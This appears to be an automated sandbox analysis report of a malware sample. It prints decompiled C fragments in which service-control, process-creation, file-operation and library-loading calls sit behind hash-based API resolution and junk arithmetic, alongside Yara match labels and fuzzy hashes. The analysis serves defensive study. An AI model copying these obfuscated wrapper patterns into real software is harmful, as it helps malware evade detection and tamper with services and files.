                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                      • String ID:
                                                      • API String ID: 2633735394-0
                                                      • Opcode ID: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
                                                      • Instruction ID: 929118807ddd2d015550d77d84a67e82c7ccc00f3a1cd5c495e14181e13c7b39
                                                      • Opcode Fuzzy Hash: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
                                                      • Instruction Fuzzy Hash: D6014C72000109BBEF02CF55DC01EDA3BBAFF5C790F228119F91862124C732E961DBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • StringFromGUID2.OLE32(?,?,00000027), ref: 100032CF
                                                      • GetModuleFileNameW.KERNEL32(10000000,?,00000104,?,10002572,1000D260,80000002,5DA49213), ref: 100032E3
                                                      Strings
                                                      • Recipe (.recipe) Property Handler, xrefs: 100032A6
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: FileFromModuleNameString
                                                      • String ID: Recipe (.recipe) Property Handler
                                                      • API String ID: 1402647516-129706424
                                                      • Opcode ID: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
                                                      • Instruction ID: 6f8015bcf9db97dc62130dd9dbc2d8b03967e6a2f427fd85d2ca8f80d55362ab
                                                      • Opcode Fuzzy Hash: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
                                                      • Instruction Fuzzy Hash: 7AF01231510718AFD310DFA8C844E96B7E8EF09754F00851BF689D7610E7B0A544CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E10001980(void* _a4) {
                                                      				void* _t15;
                                                      				void* _t16;
                                                      				void* _t20;
                                                      				intOrPtr _t23;
                                                      				void* _t30;
                                                      				signed int _t32;
                                                      				void* _t34;
                                                      				void* _t35;
                                                      
                                                      				_t34 = _a4;
                                                      				if(_t34 == 0) {
                                                      					return _t15;
                                                      				}
                                                      				if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
                                                      					_t30 =  *(_t34 + 4);
                                                      					 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x28)) + _t30))(_t30, 0, 0);
                                                      				}
                                                      				if( *(_t34 + 8) == 0) {
                                                      					L10:
                                                      					_t16 =  *(_t34 + 4);
                                                      					if(_t16 != 0) {
                                                      						VirtualFree(_t16, 0, 0x8000);
                                                      					}
                                                      					return HeapFree(GetProcessHeap(), 0, _t34);
                                                      				} else {
                                                      					_t32 = 0;
                                                      					if( *((intOrPtr*)(_t34 + 0xc)) <= 0) {
                                                      						L8:
                                                      						_t20 =  *(_t34 + 8);
                                                      						if(_t20 != 0) {
                                                      							VirtualFree(_t20, 0, 0x8000);
                                                      						}
                                                      						goto L10;
                                                      					} else {
                                                      						goto L5;
                                                      					}
                                                      					do {
                                                      						L5:
                                                      						_t23 =  *((intOrPtr*)( *(_t34 + 8) + _t32 * 4));
                                                      						if(_t23 != 0) {
                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x24))))(_t23,  *((intOrPtr*)(_t34 + 0x28)));
                                                      							_t35 = _t35 + 8;
                                                      						}
                                                      						_t32 = _t32 + 1;
                                                      					} while (_t32 <  *((intOrPtr*)(_t34 + 0xc)));
                                                      					goto L8;
                                                      				}
                                                      			}












                                                      APIs
                                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019DC
                                                      • VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019F1
                                                      • GetProcessHeap.KERNEL32(00000000,EC8B55CC,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100019FA
                                                      • HeapFree.KERNEL32(00000000,?,10001DC4), ref: 10001A01
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: Free$HeapVirtual$Process
                                                      • String ID:
                                                      • API String ID: 3505259878-0
                                                      • Opcode ID: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
                                                      • Instruction ID: 46a294df184e67868fe018602a73977999fd3160e39f49d8b46b80fbf7fdd7f8
                                                      • Opcode Fuzzy Hash: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
                                                      • Instruction Fuzzy Hash: 1E115A31600711ABE620DBA5CC89F9673E8EB48BD1F108818F59AD7294CB70F841CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Executed Functions

                                                      C-Code - Quality: 62%
                                                      			E001E2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t30;
                                                      				void* _t39;
                                                      				signed int _t41;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(0);
                                                      				_push(0);
                                                      				E001E602B(_t30);
                                                      				_v12 = 0x5e3c;
                                                      				_t41 = 0x63;
                                                      				_v12 = _v12 / _t41;
                                                      				_t42 = 0x2f;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x000064be;
                                                      				_v8 = 0x74da;
                                                      				_v8 = _v8 | 0xfefeeaea;
                                                      				_v8 = _v8 >> 0xc;
                                                      				_v8 = _v8 ^ 0x000fb531;
                                                      				E001F07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                                      				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                                      				return _t39;
                                                      			}










                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001E29DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction ID: f29e54dee73b85a96df9d17acf58ceeec97b552066db9f924e08f68ae3473b75
                                                      • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction Fuzzy Hash: 19018072A00108BFEB14DF95DC0A8DFBFB6EF48750F108088F508A6250D7B65F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E001EC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t29;
                                                      				intOrPtr* _t33;
                                                      				void* _t34;
                                                      
                                                      				E001E602B(_t29);
                                                      				_v28 = 0x4fe02f;
                                                      				_v24 = 0x232390;
                                                      				_v20 = 0xf8460;
                                                      				_v16 = 0;
                                                      				_v12 = 0xf625;
                                                      				_v12 = _v12 >> 6;
                                                      				_v12 = _v12 >> 0xa;
                                                      				_v12 = _v12 + 0xffffcc6f;
                                                      				_v12 = _v12 ^ 0xffffa5b6;
                                                      				_v8 = 0xe5cd;
                                                      				_v8 = _v8 + 0xffffae4d;
                                                      				_v8 = _v8 | 0xf8bbefe7;
                                                      				_v8 = _v8 ^ 0xf8bbcc9a;
                                                      				_t33 = E001F07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                                      				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                                      				return _t34;
                                                      			}













                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001EC762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction ID: 6944b5eda7ddc599a285dfadfb83d98871e35aac18c3631d2d2e62f16343f5b4
                                                      • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction Fuzzy Hash: DC1133B290122DBBCB25DF95DC498EFBFB8EF14754F108188F90962220D3714B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E001E1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				void* _t33;
                                                      				struct HINSTANCE__* _t40;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				E001E602B(_t33);
                                                      				_v16 = _v16 & 0x00000000;
                                                      				_v24 = 0x1b2eda;
                                                      				_v20 = 0x33a3b7;
                                                      				_v12 = 0x98c;
                                                      				_v12 = _v12 + 0xb426;
                                                      				_v12 = _v12 + 0x5beb;
                                                      				_t42 = 0x63;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x00000fce;
                                                      				_v8 = 0x120e;
                                                      				_v8 = _v8 + 0xfffffcb8;
                                                      				_v8 = _v8 + 0xffffefaa;
                                                      				_v8 = _v8 >> 5;
                                                      				_v8 = _v8 ^ 0x07ff9a02;
                                                      				E001F07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                                      				_t40 = LoadLibraryW(_a12); // executed
                                                      				return _t40;
                                                      			}












                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 001E1096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction ID: e6c4d22095a37846949824c43428ebcba9464efa8f5f78c7bbe982629098abf5
                                                      • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction Fuzzy Hash: 96015BB6D0170CBBDF04DF94C94A5DEBBB1AB54318F108188E51466291D3B19B649B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E001E4859() {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      
                                                      				_v12 = 0xafe2;
                                                      				_v12 = _v12 * 0x42;
                                                      				_v12 = _v12 + 0xffffdd89;
                                                      				_v12 = _v12 ^ 0x002d198d;
                                                      				_v8 = 0x5b09;
                                                      				_v8 = _v8 | 0xa1ea9544;
                                                      				_v8 = _v8 * 0x12;
                                                      				_v8 = _v8 ^ 0x6283d9c1;
                                                      				E001F07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                                      				ExitProcess(0);
                                                      			}







                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 001E48B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction ID: db10be173d78d936ff7409dc4a61335d5f4ce6dd59e8ceb58d4ae770844ed64b
                                                      • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction Fuzzy Hash: 6FF0F4B0A05209BBDB04CFE8CA5699EBFB9AB40301F208188E444A7290E3B15F509A50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 66%
                                                      			E001F4F7D(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t17;
                                                      				int _t24;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001E602B(_t17);
                                                      				_v12 = 0xddd8;
                                                      				_v12 = _v12 * 0x48;
                                                      				_v12 = _v12 ^ 0x003e66d8;
                                                      				_v8 = 0xcb35;
                                                      				_v8 = _v8 ^ 0x7b88573c;
                                                      				_v8 = _v8 * 0x59;
                                                      				_v8 = _v8 ^ 0xf27e4a21;
                                                      				E001F07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                                      				_t24 = CloseHandle(_a4); // executed
                                                      				return _t24;
                                                      			}








                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 001F4FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction ID: 3a5fbf3e33bfcad55dc1fab4b82b1efc569f49ed361eebb7fe294ba9cd13fcc4
                                                      • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction Fuzzy Hash: 50F037B081120CFFDB04EFA4D94289EBFBAEB44340F208299E804AB261D3715B509B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 21%
                                                      			E001F976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t34;
                                                      				int _t39;
                                                      				struct _PROCESS_INFORMATION* _t48;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t48 = __edx;
                                                      				_push(0);
                                                      				_push(_a68);
                                                      				_push(0);
                                                      				_push(_a60);
                                                      				_push(_a56);
                                                      				_push(_a52);
                                                      				_push(0);
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E001E602B(_t34);
                                                      				_v12 = 0xaff9;
                                                      				_v12 = _v12 | 0xcee54bd1;
                                                      				_v12 = _v12 + 0x6ed6;
                                                      				_v12 = _v12 ^ 0xcee61221;
                                                      				_v8 = 0x6229;
                                                      				_v8 = _v8 ^ 0x42aa9f31;
                                                      				_v8 = _v8 >> 2;
                                                      				_v8 = _v8 ^ 0x10aad83f;
                                                      				E001F07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                                      				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                                      				return _t39;
                                                      			}









                                                      APIs
                                                      • CreateProcessW.KERNEL32(001E591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001E591A), ref: 001F9816
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction ID: 86c2c147634ef3138d853ec8a87c4843de297417a20e506b2cc7360b5490e1f8
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: 1D11B372901188BBDF1A9FD6DC0ACDF7F7AEF99750F104148FA1556120D2728A60EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 31%
                                                      			E001EB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t32;
                                                      				void* _t38;
                                                      				long _t47;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a48);
                                                      				_t47 = __edx;
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(_a36);
                                                      				_push(_a32);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(0);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(0);
                                                      				E001E602B(_t32);
                                                      				_v8 = 0xfd14;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 * 0x7a;
                                                      				_v8 = _v8 >> 9;
                                                      				_v8 = _v8 ^ 0x00002bef;
                                                      				_v12 = 0x4f26;
                                                      				_v12 = _v12 | 0xe7e97f76;
                                                      				_v12 = _v12 ^ 0xe7e94dbb;
                                                      				E001F07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                                      				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                                      				return _t38;
                                                      			}









                                                      APIs
                                                      • CreateFileW.KERNELBASE(001F0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001F0668,?,?,?,?), ref: 001EB5FD
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: 64c03b7127ba3bee54388474f9df1fc94ff169f200a39c6328bbd3ed7b90b682
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: 2A11C372801248BBDF16DF95DD06CEE7F7AFF99714F148198FA1862120D3729A60EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E001F981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      				void* _t28;
                                                      				void* _t34;
                                                      				long _t37;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a16);
                                                      				_t34 = __edx;
                                                      				_t37 = __ecx;
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E001E602B(_t22);
                                                      				_v12 = 0xe68;
                                                      				_v12 = _v12 * 0x39;
                                                      				_v12 = _v12 ^ 0xd1b1d871;
                                                      				_v12 = _v12 ^ 0xd1b2fb7e;
                                                      				_v8 = 0x629e;
                                                      				_v8 = _v8 + 0xfffff5da;
                                                      				_v8 = _v8 | 0xbef7b77b;
                                                      				_v8 = _v8 ^ 0xbef79fc3;
                                                      				E001F07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                                      				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                                      				return _t28;
                                                      			}










                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001E87F2,0000CAAE,0000510C,AD82F196), ref: 001F989B
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: 1bf3bad15c3aece8f2b403b3292d11e26047bfd38b1ea934f0c7b56989d86508
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: 0B019A72801208FBDB04EFD5D846CDFBF79EF95750F108188F908A6220E6715B619BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E001F7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				int _t31;
                                                      				signed int _t33;
                                                      				struct _SHFILEOPSTRUCTW* _t40;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_t40 = __ecx;
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001E602B(_t24);
                                                      				_v8 = 0xa117;
                                                      				_t33 = 0x76;
                                                      				_v8 = _v8 / _t33;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 ^ 0x210fe703;
                                                      				_v8 = _v8 ^ 0x210fdcea;
                                                      				_v12 = 0xf1e9;
                                                      				_v12 = _v12 << 9;
                                                      				_v12 = _v12 ^ 0x01e3a445;
                                                      				E001F07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                                      				_t31 = SHFileOperationW(_t40); // executed
                                                      				return _t31;
                                                      			}










                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001F7C67
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 52%
                                                      			E001EF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				void* _t29;
                                                      				int _t35;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a20);
                                                      				_t35 = __ecx;
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001E602B(_t24);
                                                      				_v12 = 0xd5a7;
                                                      				_v12 = _v12 ^ 0x994cba9d;
                                                      				_v12 = _v12 ^ 0x994c19d3;
                                                      				_v8 = 0xac88;
                                                      				_v8 = _v8 << 3;
                                                      				_v8 = _v8 >> 8;
                                                      				_v8 = _v8 + 0xebed;
                                                      				_v8 = _v8 ^ 0x0000ab82;
                                                      				E001F07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                                      				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                                      				return _t29;
                                                      			}









                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001EF6D8
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E001EB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t23;
                                                      				intOrPtr* _t27;
                                                      				void* _t28;
                                                      
                                                      				E001E602B(_t23);
                                                      				_v12 = 0x9431;
                                                      				_v12 = _v12 >> 7;
                                                      				_v12 = _v12 ^ 0x0000160f;
                                                      				_v8 = 0xc972;
                                                      				_v8 = _v8 ^ 0x829e0126;
                                                      				_v8 = _v8 + 0x4512;
                                                      				_v8 = _v8 + 0xffff18f9;
                                                      				_v8 = _v8 ^ 0x829e24c1;
                                                      				_t27 = E001F07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                                      				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                                      				return _t28;
                                                      			}









                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001EB759
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2108276475.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 00000008.00000002.2108256857.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 00000008.00000002.2108331926.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
